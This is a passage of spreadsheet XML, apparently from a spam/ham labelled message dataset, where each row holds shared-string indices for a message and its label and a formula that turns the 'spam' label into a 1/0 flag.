    <row r="4467" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4467" t="s">
        <v>9472</v>
      </c>
      <c r="B4467" t="s">
        <v>5294</v>
      </c>
      <c r="C4467" s="1">
        <f>IF(B4467="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4468" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4468" t="s">
        <v>8335</v>
      </c>
      <c r="B4468" t="s">
        <v>5294</v>
      </c>
      <c r="C4468" s="1">
        <f>IF(B4468="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4469" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4469" t="s">
        <v>9473</v>
      </c>
      <c r="B4469" t="s">
        <v>5294</v>
      </c>
      <c r="C4469" s="1">
        <f>IF(B4469="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4470" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4470" t="s">
        <v>9474</v>
      </c>
      <c r="B4470" t="s">
        <v>5294</v>
      </c>
      <c r="C4470" s="1">
        <f>IF(B4470="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4471" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4471" t="s">
        <v>9475</v>
      </c>
      <c r="B4471" t="s">
        <v>5294</v>
      </c>
      <c r="C4471" s="1">
        <f>IF(B4471="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4472" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4472" t="s">
        <v>9476</v>
      </c>
      <c r="B4472" t="s">
        <v>5294</v>
      </c>
      <c r="C4472" s="1">
        <f>IF(B4472="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4473" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4473" t="s">
        <v>9477</v>
      </c>
      <c r="B4473" t="s">
        <v>5297</v>
      </c>
      <c r="C4473" s="1">
        <f>IF(B4473="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4474" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4474" t="s">
        <v>9478</v>
      </c>
      <c r="B4474" t="s">
        <v>5294</v>
      </c>
      <c r="C4474" s="1">
        <f>IF(B4474="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4475" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4475" t="s">
        <v>9479</v>
      </c>
      <c r="B4475" t="s">
        <v>5297</v>
      </c>
      <c r="C4475" s="1">
        <f>IF(B4475="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4476" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4476" t="s">
        <v>9480</v>
      </c>
      <c r="B4476" t="s">
        <v>5294</v>
      </c>
      <c r="C4476" s="1">
        <f>IF(B4476="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4477" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4477" t="s">
        <v>9481</v>
      </c>
      <c r="B4477" t="s">
        <v>5294</v>
      </c>
      <c r="C4477" s="1">
        <f>IF(B4477="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4478" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4478" t="s">
        <v>9482</v>
      </c>
      <c r="B4478" t="s">
        <v>5294</v>
      </c>
      <c r="C4478" s="1">
        <f>IF(B4478="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4479" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4479" t="s">
        <v>9483</v>
      </c>
      <c r="B4479" t="s">
        <v>5294</v>
      </c>
      <c r="C4479" s="1">
        <f>IF(B4479="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4480" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4480" t="s">
        <v>9484</v>
      </c>
      <c r="B4480" t="s">
        <v>5294</v>
      </c>
      <c r="C4480" s="1">
        <f>IF(B4480="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4481" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4481" t="s">
        <v>9485</v>
      </c>
      <c r="B4481" t="s">
        <v>5294</v>
      </c>
      <c r="C4481" s="1">
        <f>IF(B4481="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4482" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4482" t="s">
        <v>9486</v>
      </c>
      <c r="B4482" t="s">
        <v>5294</v>
      </c>
      <c r="C4482" s="1">
        <f>IF(B4482="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4483" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4483" t="s">
        <v>9487</v>
      </c>
      <c r="B4483" t="s">
        <v>5294</v>
      </c>
      <c r="C4483" s="1">
        <f>IF(B4483="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4484" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4484" t="s">
        <v>9488</v>
      </c>
      <c r="B4484" t="s">
        <v>5294</v>
      </c>
      <c r="C4484" s="1">
        <f>IF(B4484="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4485" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4485" t="s">
        <v>9489</v>
      </c>
      <c r="B4485" t="s">
        <v>5294</v>
      </c>
      <c r="C4485" s="1">
        <f>IF(B4485="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4486" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4486" t="s">
        <v>9490</v>
      </c>
      <c r="B4486" t="s">
        <v>5294</v>
      </c>
      <c r="C4486" s="1">
        <f>IF(B4486="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4487" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4487" t="s">
        <v>9491</v>
      </c>
      <c r="B4487" t="s">
        <v>5294</v>
      </c>
      <c r="C4487" s="1">
        <f>IF(B4487="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4488" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4488" t="s">
        <v>9492</v>
      </c>
      <c r="B4488" t="s">
        <v>5294</v>
      </c>
      <c r="C4488" s="1">
        <f>IF(B4488="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4489" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4489" t="s">
        <v>9493</v>
      </c>
      <c r="B4489" t="s">
        <v>5294</v>
      </c>
      <c r="C4489" s="1">
        <f>IF(B4489="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4490" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4490" t="s">
        <v>9494</v>
      </c>
      <c r="B4490" t="s">
        <v>5294</v>
      </c>
      <c r="C4490" s="1">
        <f>IF(B4490="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4491" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4491" t="s">
        <v>9495</v>
      </c>
      <c r="B4491" t="s">
        <v>5294</v>
      </c>
      <c r="C4491" s="1">
        <f>IF(B4491="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4492" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4492" t="s">
        <v>9496</v>
      </c>
      <c r="B4492" t="s">
        <v>5294</v>
      </c>
      <c r="C4492" s="1">
        <f>IF(B4492="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4493" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4493" t="s">
        <v>9497</v>
      </c>
      <c r="B4493" t="s">
        <v>5294</v>
      </c>
      <c r="C4493" s="1">
        <f>IF(B4493="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4494" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4494" t="s">
        <v>9498</v>
      </c>
      <c r="B4494" t="s">
        <v>5294</v>
      </c>
      <c r="C4494" s="1">
        <f>IF(B4494="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4495" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4495" t="s">
        <v>9499</v>
      </c>
      <c r="B4495" t="s">
        <v>5294</v>
      </c>
      <c r="C4495" s="1">
        <f>IF(B4495="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4496" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4496" t="s">
        <v>9500</v>
      </c>
      <c r="B4496" t="s">
        <v>5294</v>
      </c>
      <c r="C4496" s="1">
        <f>IF(B4496="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4497" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4497" t="s">
        <v>9501</v>
      </c>
      <c r="B4497" t="s">
        <v>5294</v>
      </c>
      <c r="C4497" s="1">
        <f>IF(B4497="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4498" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4498" t="s">
        <v>7154</v>
      </c>
      <c r="B4498" t="s">
        <v>5294</v>
      </c>
      <c r="C4498" s="1">
        <f>IF(B4498="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4499" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4499" t="s">
        <v>9502</v>
      </c>
      <c r="B4499" t="s">
        <v>5297</v>
      </c>
      <c r="C4499" s="1">
        <f>IF(B4499="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4500" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4500" t="s">
        <v>9503</v>
      </c>
      <c r="B4500" t="s">
        <v>5297</v>
      </c>
      <c r="C4500" s="1">
        <f>IF(B4500="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4501" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4501" t="s">
        <v>9504</v>
      </c>
      <c r="B4501" t="s">
        <v>5294</v>
      </c>
      <c r="C4501" s="1">
        <f>IF(B4501="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4502" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4502" t="s">
        <v>9505</v>
      </c>
      <c r="B4502" t="s">
        <v>5294</v>
      </c>
      <c r="C4502" s="1">
        <f>IF(B4502="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4503" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4503" t="s">
        <v>9506</v>
      </c>
      <c r="B4503" t="s">
        <v>5294</v>
      </c>
      <c r="C4503" s="1">
        <f>IF(B4503="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4504" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4504" t="s">
        <v>6705</v>
      </c>
      <c r="B4504" t="s">
        <v>5294</v>
      </c>
      <c r="C4504" s="1">
        <f>IF(B4504="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4505" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4505" t="s">
        <v>9507</v>
      </c>
      <c r="B4505" t="s">
        <v>5294</v>
      </c>
      <c r="C4505" s="1">
        <f>IF(B4505="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4506" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4506" t="s">
        <v>9508</v>
      </c>
      <c r="B4506" t="s">
        <v>5297</v>
      </c>
      <c r="C4506" s="1">
        <f>IF(B4506="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4507" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4507" t="s">
        <v>9509</v>
      </c>
      <c r="B4507" t="s">
        <v>5294</v>
      </c>
      <c r="C4507" s="1">
        <f>IF(B4507="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4508" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4508" t="s">
        <v>9510</v>
      </c>
      <c r="B4508" t="s">
        <v>5294</v>
      </c>
      <c r="C4508" s="1">
        <f>IF(B4508="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4509" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4509" t="s">
        <v>9511</v>
      </c>
      <c r="B4509" t="s">
        <v>5294</v>
      </c>
      <c r="C4509" s="1">
        <f>IF(B4509="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4510" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4510" t="s">
        <v>9512</v>
      </c>
      <c r="B4510" t="s">
        <v>5294</v>
      </c>
      <c r="C4510" s="1">
        <f>IF(B4510="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4511" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4511" t="s">
        <v>9513</v>
      </c>
      <c r="B4511" t="s">
        <v>5294</v>
      </c>
      <c r="C4511" s="1">
        <f>IF(B4511="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4512" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4512" t="s">
        <v>9514</v>
      </c>
      <c r="B4512" t="s">
        <v>5294</v>
      </c>
      <c r="C4512" s="1">
        <f>IF(B4512="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4513" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4513" t="s">
        <v>9515</v>
      </c>
      <c r="B4513" t="s">
        <v>5294</v>
      </c>
      <c r="C4513" s="1">
        <f>IF(B4513="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4514" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4514" t="s">
        <v>9516</v>
      </c>
      <c r="B4514" t="s">
        <v>5297</v>
      </c>
      <c r="C4514" s="1">
        <f>IF(B4514="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4515" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4515" t="s">
        <v>9517</v>
      </c>
      <c r="B4515" t="s">
        <v>5294</v>
      </c>
      <c r="C4515" s="1">
        <f>IF(B4515="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4516" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4516" t="s">
        <v>9518</v>
      </c>
      <c r="B4516" t="s">
        <v>5294</v>
      </c>
      <c r="C4516" s="1">
        <f>IF(B4516="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4517" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4517" t="s">
        <v>9346</v>
      </c>
      <c r="B4517" t="s">
        <v>5297</v>
      </c>
      <c r="C4517" s="1">
        <f>IF(B4517="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4518" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4518" t="s">
        <v>9519</v>
      </c>
      <c r="B4518" t="s">
        <v>5294</v>
      </c>
      <c r="C4518" s="1">
        <f>IF(B4518="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4519" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4519" t="s">
        <v>9520</v>
      </c>
      <c r="B4519" t="s">
        <v>5294</v>
      </c>
      <c r="C4519" s="1">
        <f>IF(B4519="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4520" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4520" t="s">
        <v>9521</v>
      </c>
      <c r="B4520" t="s">
        <v>5294</v>
      </c>
      <c r="C4520" s="1">
        <f>IF(B4520="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4521" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4521" t="s">
        <v>9522</v>
      </c>
      <c r="B4521" t="s">
        <v>5294</v>
      </c>
      <c r="C4521" s="1">
        <f>IF(B4521="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4522" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4522" t="s">
        <v>9523</v>
      </c>
      <c r="B4522" t="s">
        <v>5294</v>
      </c>
      <c r="C4522" s="1">
        <f>IF(B4522="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4523" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4523" t="s">
        <v>9524</v>
      </c>
      <c r="B4523" t="s">
        <v>5294</v>
      </c>
      <c r="C4523" s="1">
        <f>IF(B4523="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4524" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4524" t="s">
        <v>9525</v>
      </c>
      <c r="B4524" t="s">
        <v>5294</v>
      </c>
      <c r="C4524" s="1">
        <f>IF(B4524="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4525" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4525" t="s">
        <v>9526</v>
      </c>
      <c r="B4525" t="s">
        <v>5294</v>
      </c>
      <c r="C4525" s="1">
        <f>IF(B4525="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4526" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4526" t="s">
        <v>9527</v>
      </c>
      <c r="B4526" t="s">
        <v>5294</v>
      </c>
      <c r="C4526" s="1">
        <f>IF(B4526="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4527" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4527" t="s">
        <v>9528</v>
      </c>
      <c r="B4527" t="s">
        <v>5297</v>
      </c>
      <c r="C4527" s="1">
        <f>IF(B4527="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4528" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4528" t="s">
        <v>9529</v>
      </c>
      <c r="B4528" t="s">
        <v>5294</v>
      </c>
      <c r="C4528" s="1">
        <f>IF(B4528="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4529" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4529" t="s">
        <v>9530</v>
      </c>
      <c r="B4529" t="s">
        <v>5294</v>
      </c>
      <c r="C4529" s="1">
        <f>IF(B4529="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4530" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4530" t="s">
        <v>9531</v>
      </c>
      <c r="B4530" t="s">
        <v>5294</v>
      </c>
      <c r="C4530" s="1">
        <f>IF(B4530="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4531" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4531" t="s">
        <v>9532</v>
      </c>
      <c r="B4531" t="s">
        <v>5294</v>
      </c>
      <c r="C4531" s="1">
        <f>IF(B4531="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4532" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4532" t="s">
        <v>9533</v>
      </c>
      <c r="B4532" t="s">
        <v>5294</v>
      </c>
      <c r="C4532" s="1">
        <f>IF(B4532="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4533" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4533" t="s">
        <v>9534</v>
      </c>
      <c r="B4533" t="s">
        <v>5294</v>
      </c>
      <c r="C4533" s="1">
        <f>IF(B4533="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4534" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4534" t="s">
        <v>9535</v>
      </c>
      <c r="B4534" t="s">
        <v>5297</v>
      </c>
      <c r="C4534" s="1">
        <f>IF(B4534="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4535" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4535" t="s">
        <v>9536</v>
      </c>
      <c r="B4535" t="s">
        <v>5294</v>
      </c>
      <c r="C4535" s="1">
        <f>IF(B4535="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4536" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4536" t="s">
        <v>9537</v>
      </c>
      <c r="B4536" t="s">
        <v>5294</v>
      </c>
      <c r="C4536" s="1">
        <f>IF(B4536="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4537" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4537" t="s">
        <v>6839</v>
      </c>
      <c r="B4537" t="s">
        <v>5294</v>
      </c>
      <c r="C4537" s="1">
        <f>IF(B4537="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4538" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4538" t="s">
        <v>9538</v>
      </c>
      <c r="B4538" t="s">
        <v>5294</v>
      </c>
      <c r="C4538" s="1">
        <f>IF(B4538="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4539" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4539" t="s">
        <v>9539</v>
      </c>
      <c r="B4539" t="s">
        <v>5294</v>
      </c>
      <c r="C4539" s="1">
        <f>IF(B4539="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4540" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4540" t="s">
        <v>9540</v>
      </c>
      <c r="B4540" t="s">
        <v>5294</v>
      </c>
      <c r="C4540" s="1">
        <f>IF(B4540="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4541" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4541" t="s">
        <v>9541</v>
      </c>
      <c r="B4541" t="s">
        <v>5294</v>
      </c>
      <c r="C4541" s="1">
        <f>IF(B4541="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4542" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4542" t="s">
        <v>9542</v>
      </c>
      <c r="B4542" t="s">
        <v>5294</v>
      </c>
      <c r="C4542" s="1">
        <f>IF(B4542="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4543" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4543" t="s">
        <v>9543</v>
      </c>
      <c r="B4543" t="s">
        <v>5297</v>
      </c>
      <c r="C4543" s="1">
        <f>IF(B4543="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4544" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4544" t="s">
        <v>9544</v>
      </c>
      <c r="B4544" t="s">
        <v>5294</v>
      </c>
      <c r="C4544" s="1">
        <f>IF(B4544="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4545" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4545" t="s">
        <v>9545</v>
      </c>
      <c r="B4545" t="s">
        <v>5294</v>
      </c>
      <c r="C4545" s="1">
        <f>IF(B4545="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4546" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4546" t="s">
        <v>9546</v>
      </c>
      <c r="B4546" t="s">
        <v>5294</v>
      </c>
      <c r="C4546" s="1">
        <f>IF(B4546="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4547" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4547" t="s">
        <v>9547</v>
      </c>
      <c r="B4547" t="s">
        <v>5294</v>
      </c>
      <c r="C4547" s="1">
        <f>IF(B4547="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4548" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4548" t="s">
        <v>9548</v>
      </c>
      <c r="B4548" t="s">
        <v>5294</v>
      </c>
      <c r="C4548" s="1">
        <f>IF(B4548="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4549" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4549" t="s">
        <v>6173</v>
      </c>
      <c r="B4549" t="s">
        <v>5294</v>
      </c>
      <c r="C4549" s="1">
        <f>IF(B4549="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4550" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4550" t="s">
        <v>9549</v>
      </c>
      <c r="B4550" t="s">
        <v>5294</v>
      </c>
      <c r="C4550" s="1">
        <f>IF(B4550="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4551" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4551" t="s">
        <v>9550</v>
      </c>
      <c r="B4551" t="s">
        <v>5294</v>
      </c>
      <c r="C4551" s="1">
        <f>IF(B4551="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4552" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4552" t="s">
        <v>9551</v>
      </c>
      <c r="B4552" t="s">
        <v>5294</v>
      </c>
      <c r="C4552" s="1">
        <f>IF(B4552="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4553" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4553" t="s">
        <v>9552</v>
      </c>
      <c r="B4553" t="s">
        <v>5294</v>
      </c>
      <c r="C4553" s="1">
        <f>IF(B4553="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4554" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4554" t="s">
        <v>9553</v>
      </c>
      <c r="B4554" t="s">
        <v>5294</v>
      </c>
      <c r="C4554" s="1">
        <f>IF(B4554="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4555" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4555" t="s">
        <v>9554</v>
      </c>
      <c r="B4555" t="s">
        <v>5294</v>
      </c>
      <c r="C4555" s="1">
        <f>IF(B4555="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4556" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4556" t="s">
        <v>6719</v>
      </c>
      <c r="B4556" t="s">
        <v>5294</v>
      </c>
      <c r="C4556" s="1">
        <f>IF(B4556="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4557" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4557" t="s">
        <v>9555</v>
      </c>
      <c r="B4557" t="s">
        <v>5294</v>
      </c>
      <c r="C4557" s="1">
        <f>IF(B4557="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4558" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4558" t="s">
        <v>9556</v>
      </c>
      <c r="B4558" t="s">
        <v>5294</v>
      </c>
      <c r="C4558" s="1">
        <f>IF(B4558="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4559" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4559" t="s">
        <v>9557</v>
      </c>
      <c r="B4559" t="s">
        <v>5294</v>
      </c>
      <c r="C4559" s="1">
        <f>IF(B4559="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4560" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4560" t="s">
        <v>9558</v>
      </c>
      <c r="B4560" t="s">
        <v>5294</v>
      </c>
      <c r="C4560" s="1">
        <f>IF(B4560="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4561" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4561" t="s">
        <v>9559</v>
      </c>
      <c r="B4561" t="s">
        <v>5294</v>
      </c>
      <c r="C4561" s="1">
        <f>IF(B4561="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4562" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4562" t="s">
        <v>9560</v>
      </c>
      <c r="B4562" t="s">
        <v>5294</v>
      </c>
      <c r="C4562" s="1">
        <f>IF(B4562="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4563" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4563" t="s">
        <v>9561</v>
      </c>
      <c r="B4563" t="s">
        <v>5294</v>
      </c>
      <c r="C4563" s="1">
        <f>IF(B4563="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4564" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4564" t="s">
        <v>9562</v>
      </c>
      <c r="B4564" t="s">
        <v>5294</v>
      </c>
      <c r="C4564" s="1">
        <f>IF(B4564="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4565" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4565" t="s">
        <v>9563</v>
      </c>
      <c r="B4565" t="s">
        <v>5294</v>
      </c>
      <c r="C4565" s="1">
        <f>IF(B4565="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4566" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4566" t="s">
        <v>7191</v>
      </c>
      <c r="B4566" t="s">
        <v>5294</v>
      </c>
      <c r="C4566" s="1">
        <f>IF(B4566="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4567" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4567" t="s">
        <v>9564</v>
      </c>
      <c r="B4567" t="s">
        <v>5294</v>
      </c>
      <c r="C4567" s="1">
        <f>IF(B4567="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4568" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4568" t="s">
        <v>9565</v>
      </c>
      <c r="B4568" t="s">
        <v>5294</v>
      </c>
      <c r="C4568" s="1">
        <f>IF(B4568="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4569" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4569" t="s">
        <v>9566</v>
      </c>
      <c r="B4569" t="s">
        <v>5294</v>
      </c>
      <c r="C4569" s="1">
        <f>IF(B4569="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4570" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4570" t="s">
        <v>9567</v>
      </c>
      <c r="B4570" t="s">
        <v>5294</v>
      </c>
      <c r="C4570" s="1">
        <f>IF(B4570="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
